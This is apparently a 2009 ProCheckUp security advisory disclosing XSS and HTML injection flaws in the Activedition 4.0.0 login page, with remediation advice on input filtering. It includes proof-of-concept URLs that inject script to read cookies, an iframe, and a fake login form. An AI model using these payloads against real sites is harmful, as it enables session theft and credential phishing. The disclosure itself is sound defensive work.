Multiple XSS/HTML injection vulnerabilities on Activedition 4.0.0
30 April 2009
01 May 2009
Richard Brain and Rolando Fuentes of ProCheckUp Ltd (www.procheckup.com)
Several vulnerabilities have been found on Activedition version 4.0.0; They arise from insufficient input filtering.
By using a specially-crafted link, and tricking the victim into clicking on it, an attacker can perform malicious attacks such as the following:
- Hijack user accounts by stealing the victim's cookies that are assigned to the victim's browser by the vulnerable website
- Hijack user accounts by injecting a "fake" html form on the html rendered by the victim's web browser
- Redirect the victim to a malicious third-party website which would perform a phishing attack to steal the user credentials or exploit a vulnerability (i.e.: buffer overflow) on the victim's web browser in order to compromise the victim's workstation
Vulnerable Hidden Parameters:
Parameters showing a type mismatch machine error:
Proof of concept:
http://target-domain.foo/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="x" onerror='alert(document.cookie)'&liststatus=&area=&pageid=
http://target-domain.foo/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><iframe%20src="http://www.procheckup.com" width="600%" height="300%"&liststatus=&area=&pageid=
http://target-domain.foo/activedition/aelogin.asp?status=&noreset=False&workflow=&liststatus=&area=&pageid='"<script><b>User Name<b><BR><input name="user"><BR><b>Password<b><BR><input type = "password" name="pass"><button onClick="">Log in</button
Note: the previous examples were tested on IE7 and FF2.
How to fix:
Ensure all input is filtered sufficiently before being echoed back to the client. In particular, characters such as left and right angle brackets, quotation marks, apostrophes, semicolons and ampersands should be filtered. It is highly recommended to follow a white-listing input validation approach whenever possible.
Not only should the types of characters submitted be validated, but also the length of the submitted parameter value.
Copyright 2009 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.